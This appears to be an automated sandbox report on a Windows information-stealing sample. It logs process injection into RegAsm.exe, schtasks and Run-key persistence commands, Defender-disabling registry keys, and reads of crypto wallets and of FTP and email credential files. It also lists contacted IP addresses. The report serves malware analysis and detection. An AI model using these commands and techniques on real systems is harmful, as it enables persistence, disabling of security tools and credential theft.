Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 19, 2024, 7:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (4 events)

url	https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml
url	https://crash-reports.mozilla.com/submit?id=
url	https://hg.mozilla.org/releases/mozilla-release/rev/92187d03adde4b31daef292087a266f10121379c
url	http://www.winimage.com/zLibDll

Yara rule detected in process memory (50 out of 75 events)

description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection

Queries for potentially installed applications (1 event)

Time & API	Arguments	Status	Return	Repeated
RegOpenKeyExA Jan. 19, 2024, 7:56 a.m.	regkey_r: ÍFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\ￍFTWARE\Microsoft\Windows\CurrentVersion\Uninstall		2	0

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2836 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Communicates with host for which no DNS query was performed (5 events)

host	154.92.15.189
host	109.107.182.3
host	117.18.232.200
host	185.215.113.68
host	193.233.132.62

Allocates execute permission to another process indicative of possible code injection (7 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 region_size: 1527808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000230	1
NtProtectVirtualMemory Jan. 19, 2024, 7:50 a.m.	process_identifier: 1340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077711000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Jan. 19, 2024, 7:50 a.m.	process_identifier: 1340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000776e7000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Jan. 19, 2024, 7:50 a.m.	process_identifier: 1044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077711000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Jan. 19, 2024, 7:50 a.m.	process_identifier: 1044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000776e7000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Jan. 19, 2024, 7:51 a.m.	process_identifier: 1176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077711000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Jan. 19, 2024, 7:51 a.m.	process_identifier: 1176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000776e7000 process_handle: 0x0000000000000050	1

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Jan. 19, 2024, 7:57 a.m.	service_handle: 0x00368368 service_name: WinDefend control_code: 1		0	0
ControlService Jan. 19, 2024, 7:57 a.m.	service_handle: 0x00368700 service_name: wuauserv control_code: 1		0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Jan. 19, 2024, 7:56 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Potential code injection by writing to the memory of another process (29 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PEL7geà"ÈT´à@P@Äà(¸ 4©¨¢8è¡@à.textèÆÈ `.rdata·à¸Ì@@.dataà6 @À.rsrc(¸àº¤@@.reloc4© ª^@B base_address: 0x00400000 process_identifier: 2064 process_handle: 0x00000230	1	1
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2064 process_handle: 0x00000230	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: base_address: 0x000000013f7d22b0 process_identifier: 1340 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: base_address: 0x000000013f7e0d88 process_identifier: 1340 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: I»`#z?Aÿã base_address: 0x0000000077711590 process_identifier: 1340 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: Y base_address: 0x000000013f7e0d78 process_identifier: 1340 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: I» z?Aÿã base_address: 0x00000000776e7a90 process_identifier: 1340 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: Y base_address: 0x000000013f7e0d70 process_identifier: 1340 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: ÏT base_address: 0x000000013f780108 process_identifier: 1340 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: qw@qw qw@qwqw°qw nwàTnw 3qwqwÀ´lw`,qwÀowömw Yqw2qwVqw°wwnwRqw nwQqwÂnw ?owPnw°TnwàtnwðowÐ1qwmwÐOmw`êpwÐæpwÐæpwÐ.qw base_address: 0x000000013f7daae8 process_identifier: 1340 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: base_address: 0x000000013f7e0c78 process_identifier: 1340 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: base_address: 0x000000013f7d22b0 process_identifier: 1044 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: base_address: 0x000000013f7e0d88 process_identifier: 1044 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: I»`#z?Aÿã base_address: 0x0000000077711590 process_identifier: 1044 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: d[ base_address: 0x000000013f7e0d78 process_identifier: 1044 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: I» z?Aÿã base_address: 0x00000000776e7a90 process_identifier: 1044 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: d[ base_address: 0x000000013f7e0d70 process_identifier: 1044 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: ÏT base_address: 0x000000013f780108 process_identifier: 1044 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: qw@qw qw@qwqw°qw nwàTnw 3qwqwÀ´lw`,qwÀowömw Yqw2qwVqw°wwnwRqw nwQqwÂnw ?owPnw°TnwàtnwðowÐ1qwmwÐOmw`êpwÐæpwÐæpwÐ.qw base_address: 0x000000013f7daae8 process_identifier: 1044 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:50 a.m.	buffer: base_address: 0x000000013f7e0c78 process_identifier: 1044 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:51 a.m.	buffer: base_address: 0x000000013f7d22b0 process_identifier: 1176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:51 a.m.	buffer: base_address: 0x000000013f7e0d88 process_identifier: 1176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:51 a.m.	buffer: I»`#z?Aÿã base_address: 0x0000000077711590 process_identifier: 1176 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 19, 2024, 7:51 a.m.	buffer: N base_address: 0x000000013f7e0d78 process_identifier: 1176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:51 a.m.	buffer: I» z?Aÿã base_address: 0x00000000776e7a90 process_identifier: 1176 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 19, 2024, 7:51 a.m.	buffer: N base_address: 0x000000013f7e0d70 process_identifier: 1176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:51 a.m.	buffer: ÏT base_address: 0x000000013f780108 process_identifier: 1176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:51 a.m.	buffer: qw@qw qw@qwqw°qw nwàTnw 3qwqwÀ´lw`,qwÀowömw Yqw2qwVqw°wwnwRqw nwQqwÂnw ?owPnw°TnwàtnwðowÐ1qwmwÐOmw`êpwÐæpwÐæpwÐ.qw base_address: 0x000000013f7daae8 process_identifier: 1176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 19, 2024, 7:51 a.m.	buffer: base_address: 0x000000013f7e0c78 process_identifier: 1176 process_handle: 0x000000000000004c	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PEL7geà"ÈT´à@P@Äà(¸ 4©¨¢8è¡@à.textèÆÈ `.rdata·à¸Ì@@.dataà6 @À.rsrc(¸àº¤@@.reloc4© ª^@B base_address: 0x00400000 process_identifier: 2064 process_handle: 0x00000230	1	1	0

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (2 events)

process	RegAsm.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 516 called NtSetContextThread to modify thread in remote process 2064
NtSetContextThread Jan. 19, 2024, 7:56 a.m.	registers.eip: 2005598660 registers.esp: 2293644 registers.edi: 0 registers.eax: 5223563 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000228 process_identifier: 2064	1	0	0

One or more non-whitelisted processes were created (6 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef2566e00,0x7fef2566e10,0x7fef2566e20
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xac,0xb0,0xb4,0x80,0xb8,0x7fef2566e00,0x7fef2566e10,0x7fef2566e20
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xac,0xb0,0xb4,0x80,0xb8,0x7fef2566e00,0x7fef2566e10,0x7fef2566e20
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login

Appends a known CryptoMix ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet

Resumed a suspended thread in a remote process potentially indicative of process injection (22 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 516 resumed a thread in remote process 2064
Process injection	Process 2784 resumed a thread in remote process 2568
Process injection	Process 2784 resumed a thread in remote process 3060
Process injection	Process 2784 resumed a thread in remote process 2760
Process injection	Process 2784 resumed a thread in remote process 1012
Process injection	Process 2784 resumed a thread in remote process 1132
Process injection	Process 2784 resumed a thread in remote process 2524
Process injection	Process 2836 resumed a thread in remote process 2912
Process injection	Process 1012 resumed a thread in remote process 1340
Process injection	Process 1132 resumed a thread in remote process 1044
Process injection	Process 2524 resumed a thread in remote process 1176
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000228 suspend_count: 1 process_identifier: 2064	1	0	0
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2568	1	0	0
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 3060	1	0	0
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x00000290 suspend_count: 1 process_identifier: 2760	1	0	0
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 1012	1	0	0
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 1132	1	0	0
NtResumeThread Jan. 19, 2024, 7:58 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2524	1	0	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 2912	1	0	0
NtResumeThread Jan. 19, 2024, 7:50 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 1340	1	0	0
NtResumeThread Jan. 19, 2024, 7:50 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 1044	1	0	0
NtResumeThread Jan. 19, 2024, 7:51 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 1176	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 102 events)

Time & API	Arguments	Status	Return
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 516	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 516	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 516	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000200 suspend_count: 1 process_identifier: 516	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000218 suspend_count: 1 process_identifier: 516	1	0
CreateProcessInternalW Jan. 19, 2024, 7:56 a.m.	thread_identifier: 2068 thread_handle: 0x00000228 process_identifier: 2064 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000230	1	1
NtGetContextThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000228	1	0
NtAllocateVirtualMemory Jan. 19, 2024, 7:56 a.m.	process_identifier: 2064 region_size: 1527808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000230	1	0
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PEL7geà"ÈT´à@P@Äà(¸ 4©¨¢8è¡@à.textèÆÈ `.rdata·à¸Ì@@.dataà6 @À.rsrc(¸àº¤@@.reloc4© ª^@B base_address: 0x00400000 process_identifier: 2064 process_handle: 0x00000230	1	1
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: base_address: 0x00401000 process_identifier: 2064 process_handle: 0x00000230	1	1
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: base_address: 0x0052e000 process_identifier: 2064 process_handle: 0x00000230	1	1
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: base_address: 0x0055a000 process_identifier: 2064 process_handle: 0x00000230	1	1
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: base_address: 0x0055e000 process_identifier: 2064 process_handle: 0x00000230	1	1
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: base_address: 0x0056a000 process_identifier: 2064 process_handle: 0x00000230	1	1
WriteProcessMemory Jan. 19, 2024, 7:56 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2064 process_handle: 0x00000230	1	1
NtSetContextThread Jan. 19, 2024, 7:56 a.m.	registers.eip: 2005598660 registers.esp: 2293644 registers.edi: 0 registers.eax: 5223563 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000228 process_identifier: 2064	1	0
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x00000228 suspend_count: 1 process_identifier: 2064	1	0
CreateProcessInternalW Jan. 19, 2024, 7:56 a.m.	thread_identifier: 2516 thread_handle: 0x00000138 process_identifier: 2512 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000130	1	1
CreateProcessInternalW Jan. 19, 2024, 7:56 a.m.	thread_identifier: 2624 thread_handle: 0x00000140 process_identifier: 2620 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000013c	1	1
NtResumeThread Jan. 19, 2024, 7:56 a.m.	thread_handle: 0x000001b4 suspend_count: 1 process_identifier: 2064	1	0
CreateProcessInternalW Jan. 19, 2024, 7:56 a.m.	thread_identifier: 2788 thread_handle: 0x00000654 process_identifier: 2784 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\27dnxXnblzFDiZPFTSr6.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\27dnxXnblzFDiZPFTSr6.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\27dnxXnblzFDiZPFTSr6.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000658	1	1
CreateProcessInternalW Jan. 19, 2024, 7:57 a.m.	thread_identifier: 2192 thread_handle: 0x00000658 process_identifier: 932 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\Ovmqrne2EgFGXsI2OqUM.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\Ovmqrne2EgFGXsI2OqUM.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\Ovmqrne2EgFGXsI2OqUM.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000660	1	1
CreateProcessInternalW Jan. 19, 2024, 7:57 a.m.	thread_identifier: 2284 thread_handle: 0x00000658 process_identifier: 2292 current_directory: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e filepath: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\5230B0bsHB6m0ZI1S5Bl.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\5230B0bsHB6m0ZI1S5Bl.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\jobA4iX2On64Ax7t5e\5230B0bsHB6m0ZI1S5Bl.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000650	1	1
